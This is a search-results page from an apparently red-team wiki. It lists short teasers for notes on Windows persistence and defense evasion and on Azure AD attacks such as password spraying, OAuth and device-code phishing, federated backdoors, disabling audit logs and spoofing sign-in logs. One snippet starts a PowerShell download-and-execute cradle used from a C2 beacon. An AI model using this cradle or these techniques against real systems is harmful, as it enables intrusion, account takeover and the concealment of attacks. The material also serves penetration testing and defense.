Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

31 total results found

Persistence

Windows Attacks and Enumerations

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Recon

Windows Attacks and Enumerations

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

Defense Evasion

Windows Attacks and Enumerations

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Useful links

Azure AD (AAD)

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

Overview of Azure & M365

Azure AD (AAD)

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant which represent a company (like a domain ...

Enumerate Users and Domains

Azure AD (AAD)

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

AAD Enumeration

Post-exploitation Reconnaissance

Azure AD (AAD)

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...

AAD Enumeration

Password Spraying M365

Azure AD (AAD)

This attack is not complex as it only consists in "guessing" a user's password but there are still some precautions we want to take: Slow spraying to avoid account lockouts Rotating IPs via proxies and / or VPNs to avoid IP blacklisting and to bypass location...

AAD Initial Access

OAuth 2.0 Abuse

Azure AD (AAD)

OAUth is a protocol that allows third-party applications to access services with access tokens, avoiding the disclosure of the user's credentials. What we can do as an attacker is create a malicious OAuth app to coerce users into granting the application acces...

AAD Initial Access

Abusing Device Code Authentication

Azure AD (AAD)

Device Code Authentication allows to compromise a AAD / M365 account just like OAuth Abuse but it's generally harder to detect / set up and doesn't require any input from the victim. The downside to this technique is that the device codes are valid for only a ...

AAD Initial Access

Abusing Cloud Administrator Role

Azure AD (AAD)

In this section we'll tackle an attack scenario that sees us compromising a Cloud Administrator account and wanting to get access to an application we don't have access to. This application has a Contributor RBAC role to the subscription so we'll end up assign...

AAD Privilege Escalation

Abusing User Administrator Role

Azure AD (AAD)

Just like for the Cloud Administrator section, we'll walk though a small attack scenario which starts with us compromising a User Administrator account. Let's say there is a credential vault in a subscription we are not part of and we want to get to that: what...

AAD Privilege Escalation

AAD Federated Backdoor

Azure AD (AAD)

The gist of this persistence technique is creating a malicious domain inside a target tenant and use the newly-created domain to impersonate any user from the tenant in M365. This method requires a high-privilege account to be compromised (or gained) such as D...

AAD Persistence

Malicious MFA Takeover

Azure AD (AAD)

This technique is pretty simple as it only consists in "backdooring" user accounts that don't have MFA set up; if an attacker controls one of these accounts it's possible to register new devices under that user's account. A simple way to get the MFA status of ...

AAD Persistence

Service Principal Abuse

Azure AD (AAD)

This persistence method consists in backdooring Azure applications leveraging the permissions of a SP account to gain SSO access to the environment with the permissions of that applications without the need for credentials. The main benefits of attacking SP ac...

AAD Persistence

Compromising Azure Blobs and Storage Accounts

Azure AD (AAD)

Storage Accounts are high-value targets in a tenant if an attacker is looking to exfiltrate sensitive data. What we'll focus on in this section is a common misconfiguration that exposes access keys for the storage account itself allowing an attacker to downloa...

AAD Persistence

Malicious Device Join

Azure AD (AAD)

This technique allows to bypass Conditional Access Policies based on device ownership. Since devices are identified with certificates created during the registration process, all we need is access to a user account that can register a new device that can be se...

AAD Persistence

Disabling Auditing (Unified Audit Logs)

Azure AD (AAD)

Azure's audit logs provide the vast majority of logging in the tenant and can be easily used to figure out what has been compromised and how the attack was carried out but if we manage to compromise an account with the Compliance Administrator role we can disa...

AAD Defense Evasion

Spoofing Azure Sign-In Logs

Azure AD (AAD)

In hybrid environments, every attacker with local administrator access can spoof AAD Sign-In events and every attacker with Global Administrator permissions can register fake agents to AAD. This technique can both be used to remove tracks and IOCs but also to ...

AAD Defense Evasion

Registering Fake Agents for Log Spoofing

Azure AD (AAD)

We talked about Spoofing AAD Logon logs as a ADFS administrator in [[15 - Spoofing Azure Sign-In Logs]], now we'll see how it's possible to do the same as a Global Administrator on the AAD side. As a Global Admin we can register our own AAD Connect Health agen...

AAD Defense Evasion